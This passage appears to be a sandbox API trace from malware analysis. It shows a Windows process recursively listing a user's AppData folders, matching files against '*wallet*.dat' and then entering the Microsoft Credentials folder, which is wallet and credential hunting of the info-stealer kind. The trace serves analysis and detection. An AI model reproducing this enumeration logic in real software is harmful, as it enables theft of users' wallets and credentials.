lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ea6d97, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ea6d97, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a638a82, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x48839, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x480043, cFileName="I", cAlternateFileName="C")) returned 0xffffffff [0175.343] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0175.343] StrCmpCA (pszStr1="GB.XSL", pszStr2=".") returned 25 [0175.343] StrCmpCA (pszStr1="GB.XSL", pszStr2="..") returned 25 [0175.343] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0175.343] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.343] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GB.XSL") returned 35 [0175.343] PathMatchSpecA (pszFile="GB.XSL", pszSpec="*wallet*.dat") returned 0 [0175.343] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL\\*") returned 75 [0175.343] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80eabbab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eabbab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a6d16e8, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4197e, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x420047, cFileName=".", cAlternateFileName="C")) returned 0xffffffff [0175.343] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0175.343] StrCmpCA (pszStr1="GostName.XSL", pszStr2=".") returned 25 [0175.343] StrCmpCA (pszStr1="GostName.XSL", pszStr2="..") returned 25 [0175.343] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0175.343] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.343] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GostName.XSL") returned 41 [0175.343] PathMatchSpecA (pszFile="GostName.XSL", pszSpec="*wallet*.dat") returned 0 [0175.343] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL\\*") returned 81 [0175.343] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80eaf650, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eaf650, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a638a82, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e966, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x6f0047, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0175.343] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0175.343] StrCmpCA (pszStr1="GostTitle.XSL", pszStr2=".") returned 25 [0175.343] StrCmpCA (pszStr1="GostTitle.XSL", pszStr2="..") returned 25 [0175.344] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0175.344] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.344] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 42 [0175.344] PathMatchSpecA (pszFile="GostTitle.XSL", pszSpec="*wallet*.dat") returned 0 [0175.344] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL\\*") returned 82 [0175.344] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80eb319b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eb319b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a638a82, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d639, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x6f0047, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0175.344] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0175.344] StrCmpCA (pszStr1="HarvardAnglia2008OfficeOnline.xsl", pszStr2=".") returned 26 [0175.344] StrCmpCA (pszStr1="HarvardAnglia2008OfficeOnline.xsl", pszStr2="..") returned 26 [0175.344] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0175.344] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.344] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 62 [0175.344] PathMatchSpecA (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0175.344] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl\\*") returned 102 [0175.344] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80eb804f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eb804f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a7ecfbc, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x45882, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x610048, cFileName="r", cAlternateFileName="C")) returned 0xffffffff [0175.344] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0175.344] StrCmpCA (pszStr1="IEEE2006OfficeOnline.xsl", pszStr2=".") returned 27 [0175.344] StrCmpCA (pszStr1="IEEE2006OfficeOnline.xsl", pszStr2="..") returned 27 [0175.344] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0175.344] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.344] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 53 [0175.344] PathMatchSpecA (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0175.344] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl\\*") returned 93 [0175.344] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ebb9a1, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ebb9a1, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x47e7d, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x450049, cFileName="E", cAlternateFileName="C")) returned 0xffffffff [0175.345] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0175.345] StrCmpCA (pszStr1="ISO690.XSL", pszStr2=".") returned 27 [0175.345] StrCmpCA (pszStr1="ISO690.XSL", pszStr2="..") returned 27 [0175.345] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0175.345] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.345] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 39 [0175.345] PathMatchSpecA (pszFile="ISO690.XSL", pszSpec="*wallet*.dat") returned 0 [0175.345] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL\\*") returned 79 [0175.345] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ec07b6, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ec07b6, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x42132, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x530049, cFileName="O", cAlternateFileName="C")) returned 0xffffffff [0175.345] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0175.345] StrCmpCA (pszStr1="ISO690Nmerical.XSL", pszStr2=".") returned 27 [0175.345] StrCmpCA (pszStr1="ISO690Nmerical.XSL", pszStr2="..") returned 27 [0175.345] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0175.345] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.345] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 47 [0175.345] PathMatchSpecA (pszFile="ISO690Nmerical.XSL", pszSpec="*wallet*.dat") returned 0 [0175.345] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL\\*") returned 87 [0175.345] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ec4265, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ec4265, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x351ea, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x530049, cFileName="O", cAlternateFileName="C")) returned 0xffffffff [0175.346] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0175.346] StrCmpCA (pszStr1="MLASeventhEditionOfficeOnline.xsl", pszStr2=".") returned 31 [0175.346] StrCmpCA (pszStr1="MLASeventhEditionOfficeOnline.xsl", pszStr2="..") returned 31 [0175.346] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0175.346] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.346] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 62 [0175.346] PathMatchSpecA (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0175.346] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl\\*") returned 102 [0175.346] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ecb8b4, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ecb8b4, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e4f3, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x4c004d, cFileName="A", cAlternateFileName="C")) returned 0xffffffff [0175.346] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0175.346] StrCmpCA (pszStr1="SIST02.XSL", pszStr2=".") returned 37 [0175.346] StrCmpCA (pszStr1="SIST02.XSL", pszStr2="..") returned 37 [0175.346] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0175.346] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.346] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 39 [0175.346] PathMatchSpecA (pszFile="SIST02.XSL", pszSpec="*wallet*.dat") returned 0 [0175.346] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL\\*") returned 79 [0175.346] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ed06d2, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ed06d2, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5b432832, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d5c8, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x490053, cFileName="S", cAlternateFileName="C")) returned 0xffffffff [0175.346] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0175.346] StrCmpCA (pszStr1="TURABIAN.XSL", pszStr2=".") returned 38 [0175.346] StrCmpCA (pszStr1="TURABIAN.XSL", pszStr2="..") returned 38 [0175.346] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0175.347] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.347] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 41 [0175.347] PathMatchSpecA (pszFile="TURABIAN.XSL", pszSpec="*wallet*.dat") returned 0 [0175.347] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL\\*") returned 81 [0175.347] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80ed2ca5, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ed2ca5, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5b500917, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x54256, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x550054, cFileName="R", cAlternateFileName="C")) returned 0xffffffff [0175.347] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0175.347] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.348] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName="Style", cAlternateFileName="")) returned 0 [0175.348] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.348] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x7, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0175.348] StrCmpCA (pszStr1="Credentials", pszStr2=".") returned 21 [0175.348] StrCmpCA (pszStr1="Credentials", pszStr2="..") returned 21 [0175.348] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0175.348] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.348] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Credentials") returned 21 [0175.348] PathMatchSpecA (pszFile="Credentials", pszSpec="*wallet*.dat") returned 0 [0175.348] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0175.348] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.348] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.348] FindNextFileA (in: hFindFile=0x4eb1d0, 